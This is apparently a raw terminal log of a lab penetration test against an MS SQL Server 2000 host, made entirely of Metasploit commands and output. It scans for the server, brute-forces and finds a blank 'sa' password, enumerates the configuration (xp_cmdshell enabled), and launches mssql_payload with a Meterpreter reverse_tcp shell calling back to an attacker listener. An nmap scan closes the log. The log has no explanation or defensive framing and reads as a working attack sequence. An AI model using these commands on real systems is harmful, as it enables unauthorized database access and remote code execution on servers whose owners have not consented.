mssql_ping:
msf auxiliary(mssql_ping) > show options
Module options (auxiliary/scanner/mssql/mssql_ping):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.142
RHOSTS => 192.168.1.142
msf auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.1.142:
[*] ServerName = ROOT-9743DD32E3
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] Version = 8.00.194
[*] tcp = 1433
[*] np = \\ROOT-9743DD32E3\pipe\sql\query
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
mssql_login:
msf auxiliary(mssql_login) > show options
Module options (auxiliary/scanner/mssql/mssql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME sa no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
USE_WINDOWS_AUTHENT false yes Use windows authentification
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.142
RHOSTS => 192.168.1.142
msf auxiliary(mssql_login) > run
[*] 192.168.1.142:1433 - MSSQL - Starting authentication scanner.
[*] 192.168.1.142:1433 MSSQL - [1/2] - Trying username:'sa' with password:''
[+] 192.168.1.142:1433 - MSSQL - successful login 'sa' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
mssql_enum:
msf auxiliary(mssql_enum) > show options
Module options (auxiliary/admin/mssql/mssql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification
msf auxiliary(mssql_enum) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...
[*] Version:
[*] Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
[*] May 3 2005 23:18:38
[*] Copyright (c) 1988-2003 Microsoft Corporation
[*] Enterprise Evaluation Edition on Windows NT 5.1 (Build 2600: Service Pack 3)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Enabled
[*] Ole Automation Procedures is Enabled
[*] Databases on the server:
[*] Database name:master
[*] Database Files for master:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\mastlog.ldf
[*] Database name:tempdb
[*] Database Files for tempdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\templog.ldf
[*] Database name:model
[*] Database Files for model:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\modellog.ldf
[*] Database name:msdb
[*] Database Files for msdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\msdblog.ldf
[*] Database name:pubs
[*] Database Files for pubs:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs_log.ldf
[*] Database name:Northwind
[*] Database Files for Northwind:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.ldf
[*] Database name:fasttrack
[*] Database Files for fasttrack:
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\fasttrack_Data.MDF
[*] C:\Program Files\Microsoft SQL Server\MSSQL\data\fasttrack_Log.LDF
[*] System Logins on this Server:
[*] sa
[*] BUILTIN\Administrators
[*] System Admin Logins on this Server:
[*] BUILTIN\Administrators
[*] sa
[*] Windows Logins on this Server:
[*] No Windows logins found!
[*] Windows Groups that can logins on this Server:
[*] BUILTIN\Administrators
[*] Accounts with Username and Password being the same:
[*] No Account with its password being the same as its username was found.
[*] Accounts with empty password:
[*] sa
[*] Stored Procedures with Public Execute Permission found:
[*] xp_getfiledetails
[*] xp_dirtree
[*] xp_fixeddrives
[*] xp_getnetname
[*] sp_replsetoriginator
[*] sp_replincrementlsn
[*] xp_enum_activescriptengines
[*] sp_repldone
[*] xp_fileexist
[*] sp_repltrans
[*] xp_ntsec_enumdomains
[*] sp_replcounters
[*] sp_replcmds
[*] sp_replpostschema
[*] sp_replsetsyncstatus
[*] sp_getbindtoken
[*] sp_createorphan
[*] xp_unc_to_drive
[*] sp_droporphans
[*] xp_MSplatform
[*] sp_xml_preparedocument
[*] sp_xml_removedocument
[*] xp_IsNTAdmin
[*] xp_MSnt2000
[*] xp_grantlogin
[*] xp_revokelogin
[*] xp_MSLocalSystem
[*] sp_prepexec
[*] sp_prepexecrpc
[*] sp_unprepare
[*] xp_mergexpusage
[*] xp_showlineage
[*] sp_reset_connection
[*] sp_getschemalock
[*] xp_mapdown_bitmap
[*] sp_releaseschemalock
[*] sp_resyncprepare
[*] sp_resyncexecute
[*] xp_showcolv
[*] sp_resyncexecutesql
[*] sp_resyncuniquetable
[*] sp_refreshview
[*] sp_replsendtoqueue
[*] sp_replwritetovarbin
[*] xp_qv
[*] xp_regread
[*] Instances found on this server:
[*] MSSQLSERVER
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] LocalSystem
[*] Auxiliary module execution completed
mssql_payload:
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > show options
Module options (exploit/windows/mssql/mssql_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
METHOD cmd yes Which payload delivery method to use (ps, cmd, or old)
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(mssql_payload) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf exploit(mssql_payload) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on 192.168.1.11:4444
[*] Command Stager progress - 1.47% done (1499/102246 bytes)
[*] Command Stager progress - 2.93% done (2998/102246 bytes)
[*] Command Stager progress - 4.40% done (4497/102246 bytes)
[*] Command Stager progress - 5.86% done (5996/102246 bytes)
[*] Command Stager progress - 7.33% done (7495/102246 bytes)
[*] Command Stager progress - 8.80% done (8994/102246 bytes)
[*] Command Stager progress - 10.26% done (10493/102246 bytes)
[*] Command Stager progress - 11.73% done (11992/102246 bytes)
[*] Command Stager progress - 13.19% done (13491/102246 bytes)
[*] Command Stager progress - 14.66% done (14990/102246 bytes)
[*] Command Stager progress - 16.13% done (16489/102246 bytes)
[*] Command Stager progress - 17.59% done (17988/102246 bytes)
[*] Command Stager progress - 19.06% done (19487/102246 bytes)
[*] Command Stager progress - 20.53% done (20986/102246 bytes)
[*] Command Stager progress - 21.99% done (22485/102246 bytes)
[*] Command Stager progress - 23.46% done (23984/102246 bytes)
[*] Command Stager progress - 24.92% done (25483/102246 bytes)
[*] Command Stager progress - 26.39% done (26982/102246 bytes)
[*] Command Stager progress - 27.86% done (28481/102246 bytes)
[*] Command Stager progress - 29.32% done (29980/102246 bytes)
[*] Command Stager progress - 30.79% done (31479/102246 bytes)
[*] Command Stager progress - 32.25% done (32978/102246 bytes)
[*] Command Stager progress - 33.72% done (34477/102246 bytes)
[*] Command Stager progress - 35.19% done (35976/102246 bytes)
[*] Command Stager progress - 36.65% done (37475/102246 bytes)
[*] Command Stager progress - 38.12% done (38974/102246 bytes)
[*] Command Stager progress - 39.58% done (40473/102246 bytes)
[*] Command Stager progress - 41.05% done (41972/102246 bytes)
[*] Command Stager progress - 42.52% done (43471/102246 bytes)
[*] Command Stager progress - 43.98% done (44970/102246 bytes)
[*] Command Stager progress - 45.45% done (46469/102246 bytes)
[*] Command Stager progress - 46.91% done (47968/102246 bytes)
[*] Command Stager progress - 48.38% done (49467/102246 bytes)
[*] Command Stager progress - 49.85% done (50966/102246 bytes)
[*] Command Stager progress - 51.31% done (52465/102246 bytes)
[*] Command Stager progress - 52.78% done (53964/102246 bytes)
[*] Command Stager progress - 54.24% done (55463/102246 bytes)
[*] Command Stager progress - 55.71% done (56962/102246 bytes)
[*] Command Stager progress - 57.18% done (58461/102246 bytes)
[*] Command Stager progress - 58.64% done (59960/102246 bytes)
[*] Command Stager progress - 60.11% done (61459/102246 bytes)
[*] Command Stager progress - 61.58% done (62958/102246 bytes)
[*] Command Stager progress - 63.04% done (64457/102246 bytes)
[*] Command Stager progress - 64.51% done (65956/102246 bytes)
[*] Command Stager progress - 65.97% done (67455/102246 bytes)
[*] Command Stager progress - 67.44% done (68954/102246 bytes)
[*] Command Stager progress - 68.91% done (70453/102246 bytes)
[*] Command Stager progress - 70.37% done (71952/102246 bytes)
[*] Command Stager progress - 71.84% done (73451/102246 bytes)
[*] Command Stager progress - 73.30% done (74950/102246 bytes)
[*] Command Stager progress - 74.77% done (76449/102246 bytes)
[*] Command Stager progress - 76.24% done (77948/102246 bytes)
[*] Command Stager progress - 77.70% done (79447/102246 bytes)
[*] Command Stager progress - 79.17% done (80946/102246 bytes)
[*] Command Stager progress - 80.63% done (82445/102246 bytes)
[*] Command Stager progress - 82.10% done (83944/102246 bytes)
[*] Command Stager progress - 83.57% done (85443/102246 bytes)
[*] Command Stager progress - 85.03% done (86942/102246 bytes)
[*] Command Stager progress - 86.50% done (88441/102246 bytes)
[*] Command Stager progress - 87.96% done (89940/102246 bytes)
[*] Command Stager progress - 89.43% done (91439/102246 bytes)
[*] Command Stager progress - 90.90% done (92938/102246 bytes)
[*] Command Stager progress - 92.36% done (94437/102246 bytes)
[*] Command Stager progress - 93.83% done (95936/102246 bytes)
[*] Command Stager progress - 95.29% done (97435/102246 bytes)
[*] Command Stager progress - 96.76% done (98934/102246 bytes)
[*] Command Stager progress - 98.19% done (100400/102246 bytes)
[*] Command Stager progress - 99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.
nmap:
root@root:~# nmap -sU --script=ms-sql-info 192.168.1.142
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2013-05-14 19:35 EDT
Nmap scan report for 192.168.1.142
Host is up (0.00065s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
123/udp open ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:F1:31:D2 (VMware)
Host script results:
| ms-sql-info:
| Windows server name: ROOT-9743DD32E3
| [192.168.1.142\MSSQLSERVER]
| Instance name: MSSQLSERVER
| Version: Microsoft SQL Server 2000 SP4
| Version number: 8.00.2039.00
| Product: Microsoft SQL Server 2000
| Service pack level: SP4
| Post-SP patches applied: No
| TCP port: 1433
| Named pipe: \\192.168.1.142\pipe\sql\query
|_ Clustered: No
Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds